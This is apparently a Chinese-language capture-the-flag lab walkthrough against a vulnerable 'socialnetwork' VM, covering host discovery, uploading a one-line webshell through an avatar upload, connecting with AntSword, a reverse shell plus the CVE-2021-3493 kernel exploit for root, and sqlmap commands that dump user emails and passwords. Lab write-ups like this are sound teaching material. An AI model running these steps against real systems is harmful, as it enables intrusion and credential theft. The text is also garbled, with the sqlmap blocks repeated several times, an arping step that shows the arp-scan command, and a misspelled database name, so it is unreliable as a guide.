目录
一、环境配置问题
二、主机发现
1.arp-scan
2.arping
3.netdiscover
4.nmap
三、端口扫描
四、服务版本发现
五、登录web服务
1.8000端口
2.80端口
(1)80端口是个登录地址
(2)注册并登录,进行信息收集
六、信息收集
1.界面
2.profile
七、antsword(蚁剑)
1.通过蚁剑来连接我们上传的后门文件
2.查看内核版本
八、提权
1.上传文件
2.编译执行
3.反弹shell
九、主页下的sql注入
1.在search框里还有一个sql注入点
2.抓包,sqlmap跑一下
(1)request的包保存到本地
(2)sqlmap
2.1跑下数据库
2.2 跑下表
2.3看下列
2.4看下user_password和user_email中的字段
一、环境配置问题
这次在导入靶场的时候,由于各种问题,就卸载了一次,但再次安装时,显示无法导入,经过一番搜索,发现是虚拟硬盘没有删除干净,将原先创建的虚拟硬盘删除后,再次导入,即可导入成功
二、主机发现
靶机和kali位于同一网段,总结下四种方法。
1.arp-scan
sudo arp-scan -l
2.arping
sudo arp-scan -l
由于这个arping是对单个ip进行发包的,所以简单写个循环
for i in $(seq 1 254);do sudo arping -c 2 192.168.43.$i;done
3.netdiscover
sudo netdiscover -r 192.168.43.27/16
sudo netdiscover -r 192.168.43.27/16
4.nmap
sudo nmap -sn ip/子网掩码
sudo nmap -sn ip/子网掩码
三、端口扫描
四、服务版本发现
五、登录web服务
1.8000端口
8000端口页面报错,写的不支持get请求方法,我们可以用burpsuite抓包后,来尝试别的登陆方式,如option,post等,发现还是无用
2.80端口
(1)80端口是个登录地址
(2)注册并登录,进行信息收集
六、信息收集
1.界面
是一个留言板,我们输入的信息会输出到下面,上栏有一系列的功能框
2.profile
这里面可以上传头像,并且可以查看到路径地址,并且可以上传一个一句话木马,
七、antsword(蚁剑)
1.通过蚁剑来连接我们上传的后门文件
2.查看内核版本
uname -a
uname -a
查看具体版本
lsb_release -a
八、提权
使用ubuntu内核漏洞版本来提权
cve-2021-3493 ,github上可下载
1.上传文件
2.编译执行
发现可以执行,但是被exit退出了,提示是不能工作在这个shell上,蚁剑shell功能不够导致了提权失败,所以我们向kali端反弹shell来执行exp
3.反弹shell
用一个nc串联来反弹shell ,后执行exp,发现提权成功
九、主页下的sql注入
1.在search框里还有一个sql注入点
2.抓包,sqlmap跑一下
(1)request的包保存到本地
(2)sqlmap
sqlmap -r r -p query
2.1跑下数据库
sqlmap -r r -p query --dbs
2.2 跑下表
sqlmap -r r -p query -D socialnetwork --tables
2.3看下列
sqlmap -r r -p query -D socialnetwoek -T users --columns
2.4看下user_password和user_email中的字段
sqlmap -r r -p query -D socialnetwork -T users -C user_email,user_password --dump
(2)sqlmap
sqlmap -r r -p query
2.1跑下数据库
sqlmap -r r -p query --dbs
2.2 跑下表
sqlmap -r r -p query -D socialnetwork --tables
2.3看下列
sqlmap -r r -p query -D socialnetwoek -T users --columns
2.4看下user_password和user_email中的字段
sqlmap -r r -p query -D socialnetwork -T users -C user_email,user_password --dump
sqlmap -r r -p query
sqlmap -r r -p query --dbs
2.2 跑下表
sqlmap -r r -p query -D socialnetwork --tables
2.3看下列
sqlmap -r r -p query -D socialnetwoek -T users --columns
2.4看下user_password和user_email中的字段
sqlmap -r r -p query -D socialnetwork -T users -C user_email,user_password --dump
sqlmap -r r -p query -D socialnetwork --tables
sqlmap -r r -p query -D socialnetwoek -T users --columns
2.4看下user_password和user_email中的字段
sqlmap -r r -p query -D socialnetwork -T users -C user_email,user_password --dump
sqlmap -r r -p query -D socialnetwork -T users -C user_email,user_password --dump
可以看到我们已经知道了邮箱号和对应的密码,并且这个SQLmap帮我们进行了hash解密。得到了 明文密码。



